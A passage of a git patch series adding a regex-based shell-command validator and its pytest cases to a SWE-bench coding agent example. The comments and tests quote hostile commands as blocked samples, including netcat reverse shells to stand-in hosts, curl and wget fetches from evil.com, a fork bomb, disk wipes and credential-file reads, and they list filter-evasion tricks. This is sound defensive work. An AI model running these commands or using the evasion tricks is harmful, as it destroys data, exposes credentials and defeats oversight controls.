to device files is not allowed"), + + # Examples: "mkfs.ext4 /dev/sda", "mkfs -t ext4 /dev/sda1" + (re.compile(r'\bmkfs\b'), + "Formatting disks is not allowed"), + + # Examples: "fdisk /dev/sda", "fdisk -l /dev/nvme0n1" + (re.compile(r'\bfdisk\b'), + "Disk partitioning is not allowed"), + + # Examples: "dd if=/dev/zero of=/dev/sda", "dd of=/dev/nvme0n1" + (re.compile(r'\bdd\s+.*\bof=/dev/'), + "Writing to devices with dd is not allowed"), + + # Examples: "dd if=/dev/sda of=disk.img" (reading sensitive disk data) + (re.compile(r'\bdd\s+.*\bif=/dev/'), + "Reading from devices with dd is not allowed"), + + # Fork bomb: :(){ :|:& };: + (re.compile(r':\(\)\s*\{\s*:\|:&\s*\}\s*;:'), + "Fork bomb detected"), + + # ===== Privilege escalation ===== + # Examples: "sudo rm -rf /", "echo pwd | sudo -S cmd", "/usr/bin/sudo cmd" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?sudo\b'), + "sudo is not allowed"), + + # Examples: "doas rm file", "/usr/bin/doas cmd" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?doas\b'), + "doas is not allowed"), + + # Examples: "pkexec rm file", "pkexec /bin/bash" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?pkexec\b'), + "pkexec is not allowed"), + + # Examples: "su root", "su - admin", "su -c 'command' user" + (re.compile(r'(?:^|[;&|`]\s*)su\s+(-[^\s]*\s+)*\w'), + "su is not allowed"), + + # Examples: "chmod 777 /", "chmod -R 0777 /var" + (re.compile(r'\bchmod\s+[0-7]*777\b'), + "Setting 777 permissions is not allowed"), + + # Examples: "chown root file", "chown root:root /etc/passwd" + (re.compile(r'\bchown\s+root\b'), + "Changing ownership to root is not allowed"), + + # ===== Sensitive file access ===== + # Examples: "cat /etc/shadow", "> /etc/passwd", "< /etc/sudoers" + (re.compile(r'[<>]\s*/etc/(?:passwd|shadow|sudoers)'), + "Accessing sensitive system files is not allowed"), + + # Examples: "cat ~/.ssh/id_rsa", "cat /home/user/.aws/credentials" + (re.compile(r'\bcat\s+.*/(?:\.ssh/|\.aws/|\.env\b)'), + "Reading sensitive credential files is not allowed"), + + # ===== Arbitrary code download and network exfiltration ===== + # Examples: "wget http://evil.com/malware.sh", "wget https://x.com/script" + (re.compile(r'\bwget\s+.*https?://'), + "Downloading from URLs with wget is not allowed"), + + # Examples: "curl http://evil.com/script.sh", "curl -O https://..." + (re.compile(r'\bcurl\s+.*https?://'), + "Downloading from URLs with curl is not allowed"), + + # Examples: "nc -e /bin/bash 10.0.0.1 4444", "ncat -e cmd attacker.com" + (re.compile(r'\b(?:nc|ncat|netcat)\b.*\s-[^\s]*e'), + "Netcat reverse shell is not allowed"), +] + + +# Shell metacharacter bypass patterns that could be used to evade command-based filtering. +# These detect attempts to chain, substitute, or obfuscate commands using shell features. +# Each tuple contains (compiled_regex, error_message). +BYPASS_PATTERNS: list[tuple[re.Pattern, str]] = [ + # ===== Command substitution ===== + # Attackers can use $() or backticks to dynamically construct blocked commands. + # Examples: "$(cat /etc/shadow)", "$(echo rm -rf /)", "`whoami`", "`sudo reboot`" + (re.compile(r'\$\([^)]+\)|`[^`]+`'), + "Command substitution ($() or backticks) is not allowed"), + + # ===== Piping to shell interpreters ===== + # Attackers can pipe malicious commands to shell interpreters to bypass direct command checks. + # Examples: "echo 'rm -rf /' | bash", "cat script.sh | sh", "curl url | python" + (re.compile(r'\|\s*(?:bash|sh|zsh|ksh|dash|fish|python[23]?|perl|ruby|node)\b'), + "Piping to shell interpreter is not allowed"), + + # ===== Base64 encoded command execution ===== + # Attackers can encode malicious commands in base64 to evade pattern matching. + # Examples: "echo 'cm0gLXJmIC8=' | base64 -d | bash", "base64 -d script.b64 | sh" + (re.compile(r'base64\s+(-d|--decode).*\|\s*(?:bash|sh|zsh|python|perl)'), + "Base64 decode to shell execution is not allowed"), + + # ===== Eval and exec execution ===== + # Eval/exec can execute arbitrary strings as commands, bypassing static analysis. + # Examples: "eval 'rm -rf /'", "eval $(cat cmd.txt)", "exec rm -rf /" + (re.compile(r'\b(?:eval|exec)\s+'), + "eval/exec command execution is not allowed"), + + # ===== Here-string/here-doc to interpreter ===== + # Attackers can use here-strings or here-docs to feed commands to interpreters. + # Examples: "bash <<< 'rm -rf /'", "python <<< 'import os; os.system(\"rm -rf /\")'" + (re.compile(r'(?:bash|sh|zsh|python[23]?|perl|ruby)\s*<<<'), + "Here-string to interpreter is not allowed"), + + # ===== Process substitution ===== + # Process substitution can be used to execute commands and feed output as files. + # Examples: "cat <(curl http://evil.com)", "diff <(cat /etc/shadow) <(cat /etc/passwd)" + (re.compile(r'<\([^)]+\)'), + "Process substitution is not allowed"), + + # ===== Hex/octal escape execution ===== + # Attackers can use printf with hex/octal escapes to construct commands. + # Examples: "printf '\x72\x6d' | bash", "echo $'\x73\x75\x64\x6f'" + (re.compile(r'printf\s+[\'"][^"\']*\\[xX][0-9a-fA-F].*\|\s*(?:bash|sh)'), + "Hex escape to shell execution is not allowed"), + + # ===== Environment variable command injection ===== + # Attackers can use env vars to smuggle commands. + # Examples: "CMD='rm -rf /' && $CMD", "export X='sudo reboot'; $X" + (re.compile(r'\$\{[^}]+\}.*\|\s*(?:bash|sh)|;\s*\$[A-Z_]+\s*$'), + "Suspicious environment variable execution pattern detected"), + + # ===== Xargs command execution ===== + # Xargs can be used to execute commands from input. + # Examples: "echo 'rm -rf /' | xargs", "find . | xargs rm", "cat cmds.txt | xargs -I{} bash -c '{}'" + (re.compile(r'\|\s*xargs\s+.*(?:-I|-i).*(?:bash|sh|eval)'), + "Xargs with shell execution is not allowed"), + + # ===== Source/dot command execution ===== + # Source or dot can execute scripts in the current shell context. + # Examples: "source /tmp/malicious.sh", ". ./exploit.sh", "source <(curl url)" + (re.compile(r'(?:^|[;&|]\s*)(?:source|\.)[ \t]+'), + "source/dot command execution is not allowed"), +] + + +def validate_command(command: str) -> tuple[bool, str]: + """Validate that a command is safe to execute. + + Checks against two pattern lists: + 1. DANGEROUS_PATTERNS: Direct dangerous commands (rm -rf /, sudo, etc.) + 2. BYPASS_PATTERNS: Shell metacharacter tricks that could evade command filtering + + Args: + command: The bash command string to validate. + + Returns: + A tuple of (is_valid, error_message). + is_valid is True if the command passes all safety checks. + error_message is empty string if valid, otherwise describes the violation. + """ + # Check dangerous command patterns + for pattern, message in DANGEROUS_PATTERNS: + if pattern.search(command): + return False, message + + # Check bypass/evasion patterns + for pattern, message in BYPASS_PATTERNS: + if pattern.search(command): + return False, message + + return True, "" diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py index fe9dd3a1b6..9ecca49fe5 100644 --- a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -17,22 +17,16 @@ import asyncio import subprocess -from pathlib import Path -from unittest.mock import AsyncMock, MagicMock, patch +from unittest.mock import AsyncMock +from unittest.mock import MagicMock +from unittest.mock import patch import pytest -from nat_swe_bench.predictors.predict_iterative.predict_iterative import ( - DANGEROUS_PATTERNS, - ExecutionTimeoutError, - FormatError, - IterativeAgent, - IterativeAgentConfig, - LimitsExceeded, - Submitted, - validate_command, -) - +from nat_swe_bench.predictors.predict_iterative.predict_iterative import ExecutionTimeoutError +from nat_swe_bench.predictors.predict_iterative.predict_iterative import IterativeAgent +from nat_swe_bench.predictors.predict_iterative.predict_iterative import IterativeAgentConfig +from nat_swe_bench.predictors.predict_iterative.shell_validation import validate_command # ============================================================================= # Fixtures @@ -129,6 +123,72 @@ def test_dangerous_commands_blocked(self, command, expected_error): assert expected_error.lower() in error_msg.lower(), \ f"Error message should contain '{expected_error}', got: {error_msg}" + @pytest.mark.parametrize("command,expected_error", [ + # Command substitution + ("$(cat /etc/shadow)", "substitution"), + ("$(echo rm -rf /)", "substitution"), + ("`whoami`", "substitution"), + # Piping to shell interpreters + ("echo 'rm -rf /' | bash", "interpreter"), + ("cat script.sh | sh", "interpreter"), + ("echo cmd | python", "interpreter"), + ("cat file | perl -e", "interpreter"), + # Eval execution (without command substitution to test eval pattern specifically) + ("eval 'rm -rf /'", "eval"), + ("eval \"echo hello\"", "eval"), + # Exec execution (without dangerous commands to test exec pattern specifically) + ("exec ./script.sh", "eval"), # exec is in same pattern as eval + # Here-string to interpreter + ("bash <<< 'rm -rf /'", "here-string"), + ("python <<< 'import os'", "here-string"), + # Process substitution + ("diff <(cat /etc/shadow) file", "process substitution"), + ("bash <(echo 'echo hello')", "process substitution"), + # Xargs with shell execution + ("cat cmds.txt | xargs -I{} bash -c '{}'", "xargs"), + # Source/dot execution + ("source /tmp/malicious.sh", "source"), + (". ./exploit.sh", "source"), + ]) + def test_bypass_patterns_blocked(self, command, expected_error): + """Test that shell metacharacter bypass attempts are blocked.""" + is_valid, error_msg = validate_command(command) + assert not is_valid, f"Bypass command '{command}' should be blocked" + assert expected_error.lower() in error_msg.lower(), \ + f"Error message should contain '{expected_error}', got: {error_msg}" + + @pytest.mark.parametrize("command", [ + # These commands are blocked but by other patterns (DANGEROUS_PATTERNS) + # We test them separately to ensure they ARE blocked + "`sudo reboot`", # blocked by sudo pattern + "echo 'cm0gLXJmIC8=' | base64 -d | bash", # blocked by pipe to interpreter + "eval $(cat cmd.txt)", # blocked by command substitution pattern + "exec rm -rf /", # blocked by rm pattern + "cat <(curl http://evil.com)", # blocked by curl pattern + "printf '\\x72\\x6d' | bash", # blocked by pipe to interpreter + ]) + def test_bypass_commands_blocked_by_other_patterns(self, command): + """Test commands that are blocked by earlier patterns in the validation chain.""" + is_valid, error_msg = validate_command(command) + assert not is_valid, f"Command '{command}' should be blocked, got: {error_msg}" + + @pytest.mark.parametrize("command", [ + # Safe pipe usage (not to shell interpreters) + "grep pattern file.txt | head -10", + "cat file.txt | sort | uniq", + "ls -la | grep '.py'", + # Safe use of common tools + "find . -name '*.py' -type f", + "echo 'hello world'", + "git log --oneline | head -5", + # Safe heredoc (not to interpreter directly) + "cat << EOF > file.txt\nhello\nEOF", + ]) + def test_safe_shell_features_allowed(self, command): + """Test that legitimate shell features are not blocked.""" + is_valid, error_msg = validate_command(command) + assert is_valid, f"Safe command '{command}' should be allowed but got: {error_msg}" + # ============================================================================= # test_iterative_agent_basic_flow - End-to-end execution @@ -442,7 +502,7 @@ async def test_clone_timeout(self, tmp_path): repo_url = "https://github.com/test/repo" with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: - mock_wait.side_effect = asyncio.TimeoutError() + mock_wait.side_effect = TimeoutError() with pytest.raises(asyncio.TimeoutError): await clone_repository(repo_url, target_path, timeout=1) @@ -498,6 +558,7 @@ async def test_cleanup_handles_missing_directory(self, tmp_path): async def test_register_cleanup_error_handling(self, tmp_path): """Test that register.py cleanup handles errors gracefully.""" from unittest.mock import AsyncMock + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager # Create a mock that raises an exception @@ -554,7 +615,8 @@ def test_build_task_description_without_hints(self): @pytest.mark.asyncio async def test_repo_manager_setup_existing_repo(self, tmp_path): """Test setup_repository when repo is already active.""" - from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager, RepoContext + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoContext + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager manager = RepoManager(str(tmp_path)) @@ -609,7 +671,7 @@ async def test_checkout_timeout(self): mock_repo = MagicMock() with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: - mock_wait.side_effect = asyncio.TimeoutError() + mock_wait.side_effect = TimeoutError() with pytest.raises(asyncio.TimeoutError): await checkout_commit(mock_repo, "abc123", timeout=1) From e8e7e82722419962978eee699b0628cafd3a04f1 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Sun, 1 Feb 2026 21:31:35 -0800 Subject: [PATCH 21/22] chore(swe-bench): code review fixes - Rename "NAT framework" to "NeMo Agent Toolkit" for consistency - Remove redundant @pytest.mark.asyncio decorators (asyncio_mode=auto) - Regenerate uv.lock Signed-off-by: Jerry Guan --- .../predict_iterative/predict_iterative.py | 2 +- .../tests/test_iterative_predictor.py | 20 ------------------- .../swe_bench/uv.lock | 5 ++++- 3 files changed, 5 insertions(+), 22 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index 8a92eaf090..bc8574f507 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -22,7 +22,7 @@ 3. Observes results and adjusts strategy 4. Generates patch using git diff -The iterative loop and prompts are inspired by mini-swe-agent, adapted for the NAT framework. +The iterative loop and prompts are inspired by mini-swe-agent, adapted for NeMo Agent Toolkit. """ import asyncio diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py index 9ecca49fe5..14f00cba5c 100644 --- a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -197,7 +197,6 @@ def test_safe_shell_features_allowed(self, command): class TestIterativeAgentBasicFlow: """Tests for the basic agent execution flow.""" - @pytest.mark.asyncio async def test_basic_flow_to_submission(self, agent, mock_llm): """Test that agent completes a basic flow and submits correctly.""" # Setup: LLM returns a sequence of responses ending with submission @@ -227,7 +226,6 @@ async def test_basic_flow_to_submission(self, agent, mock_llm): assert "diff" in result or "COMPLETE_TASK" in result assert agent.n_steps == 2 - @pytest.mark.asyncio async def test_token_accumulation(self, agent, mock_llm): """Test that tokens are correctly accumulated across steps.""" responses = [ @@ -246,7 +244,6 @@ async def test_token_accumulation(self, agent, mock_llm): assert agent.total_input_tokens == 300 # 100 + 200 assert agent.total_output_tokens == 150 # 50 + 100 - @pytest.mark.asyncio async def test_step_limit_exceeded(self, mock_llm, temp_repo_path): """Test that agent stops when step limit is reached.""" config = IterativeAgentConfig(step_limit=2, timeout=5) @@ -273,7 +270,6 @@ async def test_step_limit_exceeded(self, mock_llm, temp_repo_path): class TestFormatErrorRecovery: """Tests for handling malformed LLM responses.""" - @pytest.mark.asyncio async def test_recovery_from_no_bash_block(self, agent, mock_llm): """Test that agent recovers when LLM doesn't include a bash block.""" responses = [ @@ -292,7 +288,6 @@ async def test_recovery_from_no_bash_block(self, agent, mock_llm): assert exit_status == "Submitted" assert agent.n_steps == 2 # First step failed format, second succeeded - @pytest.mark.asyncio async def test_recovery_from_multiple_bash_blocks(self, agent, mock_llm): """Test that agent recovers when LLM includes multiple bash blocks.""" responses = [ @@ -310,7 +305,6 @@ async def test_recovery_from_multiple_bash_blocks(self, agent, mock_llm): assert exit_status == "Submitted" - @pytest.mark.asyncio async def test_recovery_from_dangerous_command(self, agent, mock_llm): """Test that agent recovers when LLM suggests a dangerous command.""" responses = [ @@ -336,7 +330,6 @@ async def test_recovery_from_dangerous_command(self, agent, mock_llm): class TestTimeoutHandling: """Tests for command execution timeout handling.""" - @pytest.mark.asyncio async def test_command_timeout_recovery(self, agent, mock_llm): """Test that agent recovers from a command timeout.""" responses = [ @@ -356,7 +349,6 @@ async def test_command_timeout_recovery(self, agent, mock_llm): assert exit_status == "Submitted" - @pytest.mark.asyncio async def test_timeout_message_includes_command(self, agent, mock_llm): """Test that timeout error message includes the timed-out command.""" mock_llm.ainvoke = AsyncMock( @@ -445,7 +437,6 @@ def test_ssh_url_parsing(self, tmp_path): class TestRepoSetupAndCheckout: """Tests for git repository setup and checkout operations.""" - @pytest.mark.asyncio async def test_clone_repository_success(self, tmp_path): """Test successful repository cloning.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository @@ -464,7 +455,6 @@ async def test_clone_repository_success(self, tmp_path): assert result == mock_repo - @pytest.mark.asyncio async def test_clone_repository_invalid_url(self, tmp_path): """Test that invalid URLs raise ValueError.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository @@ -477,7 +467,6 @@ async def test_clone_repository_invalid_url(self, tmp_path): assert "Invalid repository URL" in str(exc_info.value) - @pytest.mark.asyncio async def test_checkout_commit_success(self): """Test successful commit checkout.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import checkout_commit @@ -493,7 +482,6 @@ async def test_checkout_commit_success(self): # Verify checkout was called mock_thread.assert_called_once() - @pytest.mark.asyncio async def test_clone_timeout(self, tmp_path): """Test that clone operation times out correctly.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository @@ -515,7 +503,6 @@ async def test_clone_timeout(self, tmp_path): class TestCleanup: """Tests for resource cleanup operations.""" - @pytest.mark.asyncio async def test_repo_manager_cleanup(self, tmp_path): """Test that RepoManager cleans up all active repos.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager @@ -538,7 +525,6 @@ async def test_repo_manager_cleanup(self, tmp_path): assert not repo2.exists() assert len(manager.active_repos) == 0 - @pytest.mark.asyncio async def test_cleanup_handles_missing_directory(self, tmp_path): """Test that cleanup handles already-deleted directories gracefully.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager @@ -554,7 +540,6 @@ async def test_cleanup_handles_missing_directory(self, tmp_path): assert len(manager.active_repos) == 0 - @pytest.mark.asyncio async def test_register_cleanup_error_handling(self, tmp_path): """Test that register.py cleanup handles errors gracefully.""" from unittest.mock import AsyncMock @@ -612,7 +597,6 @@ def test_build_task_description_without_hints(self): assert "Fix the bug" in result assert "Additional Context" not in result - @pytest.mark.asyncio async def test_repo_manager_setup_existing_repo(self, tmp_path): """Test setup_repository when repo is already active.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoContext @@ -643,7 +627,6 @@ async def test_repo_manager_setup_existing_repo(self, tmp_path): assert result == mock_context mock_checkout.assert_called_once() - @pytest.mark.asyncio async def test_clone_cleans_existing_path(self, tmp_path): """Test that clone removes existing directory before cloning.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository @@ -663,7 +646,6 @@ async def test_clone_cleans_existing_path(self, tmp_path): # The old directory should have been removed (in reality, then clone creates new) assert result == mock_repo - @pytest.mark.asyncio async def test_checkout_timeout(self): """Test checkout operation timeout.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import checkout_commit @@ -695,7 +677,6 @@ def test_output_truncation(self, agent): assert "elided_chars" in truncated assert "1000 characters elided" in truncated - @pytest.mark.asyncio async def test_add_message_invalid_role(self, agent): """Test that invalid role raises ValueError.""" with pytest.raises(ValueError) as exc_info: @@ -707,7 +688,6 @@ async def test_add_message_invalid_role(self, agent): class TestIntegrationMockedLLM: """Integration tests with mocked LLM.""" - @pytest.mark.asyncio async def test_full_workflow_simulation(self, tmp_path): """Simulate a complete workflow with realistic LLM responses.""" # Create a mock LLM diff --git a/examples/evaluation_and_profiling/swe_bench/uv.lock b/examples/evaluation_and_profiling/swe_bench/uv.lock index af3cf0b0ad..56ab2f0a51 100644 --- a/examples/evaluation_and_profiling/swe_bench/uv.lock +++ b/examples/evaluation_and_profiling/swe_bench/uv.lock @@ -932,6 +932,7 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/ec/e8/2e1462c8fdbe0f210feb5ac7ad2d9029af8be3bf45bd9fa39765f821642f/greenlet-3.3.1-cp311-cp311-macosx_11_0_universal2.whl", hash = "sha256:5fd23b9bc6d37b563211c6abbb1b3cab27db385a4449af5c32e932f93017080c", size = 274974, upload-time = "2026-01-23T15:31:02.891Z" }, { url = "https://files.pythonhosted.org/packages/7e/a8/530a401419a6b302af59f67aaf0b9ba1015855ea7e56c036b5928793c5bd/greenlet-3.3.1-cp311-cp311-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:09f51496a0bfbaa9d74d36a52d2580d1ef5ed4fdfcff0a73730abfbbbe1403dd", size = 577175, upload-time = "2026-01-23T16:00:56.213Z" }, { url = "https://files.pythonhosted.org/packages/8e/89/7e812bb9c05e1aaef9b597ac1d0962b9021d2c6269354966451e885c4e6b/greenlet-3.3.1-cp311-cp311-manylinux_2_24_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:cb0feb07fe6e6a74615ee62a880007d976cf739b6669cce95daa7373d4fc69c5", size = 590401, upload-time = "2026-01-23T16:05:26.365Z" }, + { url = "https://files.pythonhosted.org/packages/70/ae/e2d5f0e59b94a2269b68a629173263fa40b63da32f5c231307c349315871/greenlet-3.3.1-cp311-cp311-manylinux_2_24_s390x.manylinux_2_28_s390x.whl", hash = "sha256:67ea3fc73c8cd92f42467a72b75e8f05ed51a0e9b1d15398c913416f2dafd49f", size = 601161, upload-time = "2026-01-23T16:15:53.456Z" }, { url = "https://files.pythonhosted.org/packages/5c/ae/8d472e1f5ac5efe55c563f3eabb38c98a44b832602e12910750a7c025802/greenlet-3.3.1-cp311-cp311-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:39eda9ba259cc9801da05351eaa8576e9aa83eb9411e8f0c299e05d712a210f2", size = 590272, upload-time = "2026-01-23T15:32:49.411Z" }, { url = "https://files.pythonhosted.org/packages/a8/51/0fde34bebfcadc833550717eade64e35ec8738e6b097d5d248274a01258b/greenlet-3.3.1-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:e2e7e882f83149f0a71ac822ebf156d902e7a5d22c9045e3e0d1daf59cee2cc9", size = 1550729, upload-time = "2026-01-23T16:04:20.867Z" }, { url = "https://files.pythonhosted.org/packages/16/c9/2fb47bee83b25b119d5a35d580807bb8b92480a54b68fef009a02945629f/greenlet-3.3.1-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:80aa4d79eb5564f2e0a6144fcc744b5a37c56c4a92d60920720e99210d88db0f", size = 1615552, upload-time = "2026-01-23T15:33:45.743Z" }, @@ -940,6 +941,7 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/f9/c8/9d76a66421d1ae24340dfae7e79c313957f6e3195c144d2c73333b5bfe34/greenlet-3.3.1-cp312-cp312-macosx_11_0_universal2.whl", hash = "sha256:7e806ca53acf6d15a888405880766ec84721aa4181261cd11a457dfe9a7a4975", size = 276443, upload-time = "2026-01-23T15:30:10.066Z" }, { url = "https://files.pythonhosted.org/packages/81/99/401ff34bb3c032d1f10477d199724f5e5f6fbfb59816ad1455c79c1eb8e7/greenlet-3.3.1-cp312-cp312-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:d842c94b9155f1c9b3058036c24ffb8ff78b428414a19792b2380be9cecf4f36", size = 597359, upload-time = "2026-01-23T16:00:57.394Z" }, { url = "https://files.pythonhosted.org/packages/2b/bc/4dcc0871ed557792d304f50be0f7487a14e017952ec689effe2180a6ff35/greenlet-3.3.1-cp312-cp312-manylinux_2_24_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:20fedaadd422fa02695f82093f9a98bad3dab5fcda793c658b945fcde2ab27ba", size = 607805, upload-time = "2026-01-23T16:05:28.068Z" }, + { url = "https://files.pythonhosted.org/packages/3b/cd/7a7ca57588dac3389e97f7c9521cb6641fd8b6602faf1eaa4188384757df/greenlet-3.3.1-cp312-cp312-manylinux_2_24_s390x.manylinux_2_28_s390x.whl", hash = "sha256:c620051669fd04ac6b60ebc70478210119c56e2d5d5df848baec4312e260e4ca", size = 622363, upload-time = "2026-01-23T16:15:54.754Z" }, { url = "https://files.pythonhosted.org/packages/cf/05/821587cf19e2ce1f2b24945d890b164401e5085f9d09cbd969b0c193cd20/greenlet-3.3.1-cp312-cp312-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:14194f5f4305800ff329cbf02c5fcc88f01886cadd29941b807668a45f0d2336", size = 609947, upload-time = "2026-01-23T15:32:51.004Z" }, { url = "https://files.pythonhosted.org/packages/a4/52/ee8c46ed9f8babaa93a19e577f26e3d28a519feac6350ed6f25f1afee7e9/greenlet-3.3.1-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:7b2fe4150a0cf59f847a67db8c155ac36aed89080a6a639e9f16df5d6c6096f1", size = 1567487, upload-time = "2026-01-23T16:04:22.125Z" }, { url = "https://files.pythonhosted.org/packages/8f/7c/456a74f07029597626f3a6db71b273a3632aecb9afafeeca452cfa633197/greenlet-3.3.1-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:49f4ad195d45f4a66a0eb9c1ba4832bb380570d361912fa3554746830d332149", size = 1636087, upload-time = "2026-01-23T15:33:47.486Z" }, @@ -948,6 +950,7 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/ec/ab/d26750f2b7242c2b90ea2ad71de70cfcd73a948a49513188a0fc0d6fc15a/greenlet-3.3.1-cp313-cp313-macosx_11_0_universal2.whl", hash = "sha256:7ab327905cabb0622adca5971e488064e35115430cec2c35a50fd36e72a315b3", size = 275205, upload-time = "2026-01-23T15:30:24.556Z" }, { url = "https://files.pythonhosted.org/packages/10/d3/be7d19e8fad7c5a78eeefb2d896a08cd4643e1e90c605c4be3b46264998f/greenlet-3.3.1-cp313-cp313-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:65be2f026ca6a176f88fb935ee23c18333ccea97048076aef4db1ef5bc0713ac", size = 599284, upload-time = "2026-01-23T16:00:58.584Z" }, { url = "https://files.pythonhosted.org/packages/ae/21/fe703aaa056fdb0f17e5afd4b5c80195bbdab701208918938bd15b00d39b/greenlet-3.3.1-cp313-cp313-manylinux_2_24_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:7a3ae05b3d225b4155bda56b072ceb09d05e974bc74be6c3fc15463cf69f33fd", size = 610274, upload-time = "2026-01-23T16:05:29.312Z" }, + { url = "https://files.pythonhosted.org/packages/06/00/95df0b6a935103c0452dad2203f5be8377e551b8466a29650c4c5a5af6cc/greenlet-3.3.1-cp313-cp313-manylinux_2_24_s390x.manylinux_2_28_s390x.whl", hash = "sha256:12184c61e5d64268a160226fb4818af4df02cfead8379d7f8b99a56c3a54ff3e", size = 624375, upload-time = "2026-01-23T16:15:55.915Z" }, { url = "https://files.pythonhosted.org/packages/cb/86/5c6ab23bb3c28c21ed6bebad006515cfe08b04613eb105ca0041fecca852/greenlet-3.3.1-cp313-cp313-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:6423481193bbbe871313de5fd06a082f2649e7ce6e08015d2a76c1e9186ca5b3", size = 612904, upload-time = "2026-01-23T15:32:52.317Z" }, { url = "https://files.pythonhosted.org/packages/c2/f3/7949994264e22639e40718c2daf6f6df5169bf48fb038c008a489ec53a50/greenlet-3.3.1-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:33a956fe78bbbda82bfc95e128d61129b32d66bcf0a20a1f0c08aa4839ffa951", size = 1567316, upload-time = "2026-01-23T16:04:23.316Z" }, { url = "https://files.pythonhosted.org/packages/8d/6e/d73c94d13b6465e9f7cd6231c68abde838bb22408596c05d9059830b7872/greenlet-3.3.1-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:4b065d3284be43728dd280f6f9a13990b56470b81be20375a207cdc814a983f2", size = 1636549, upload-time = "2026-01-23T15:33:48.643Z" }, @@ -2003,8 +2006,8 @@ requires-dist = [ { name = "nvidia-nat-autogen", marker = "extra == 'most'", editable = "../../../packages/nvidia_nat_autogen" }, { name = "nvidia-nat-core", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", marker = "extra == 'core'", editable = "../../../packages/nvidia_nat_core" }, - { name = "nvidia-nat-core", marker = "extra == 'most'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["async-endpoints"], marker = "extra == 'async-endpoints'", editable = "../../../packages/nvidia_nat_core" }, + { name = "nvidia-nat-core", extras = ["async-endpoints", "gunicorn", "pii-defense", "profiling"], marker = "extra == 'most'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["gunicorn"], marker = "extra == 'gunicorn'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["pii-defense"], marker = "extra == 'pii-defense'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["profiling"], marker = "extra == 'profiling'", editable = "../../../packages/nvidia_nat_core" }, From 329c7121c9f7ce86cb2a1af16264ad31aeca9b35 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Sun, 1 Feb 2026 22:03:29 -0800 Subject: [PATCH 22/22] fix(swe-bench): add input sanitization for get_repo_path - Validate instance_id to prevent path traversal attacks (.., /, \) - Validate repo_url to prevent IndexError from malformed URLs - Add tests for both validations Signed-off-by: Jerry Guan --- .../predict_iterative/tools/git_tool.py | 23 ++++++++++-- .../tests/test_iterative_predictor.py | 37 ++++++++++++++++++- 2 files changed, 56 insertions(+), 4 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index d6dd49b28f..77b0bcdb87 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -79,7 +79,7 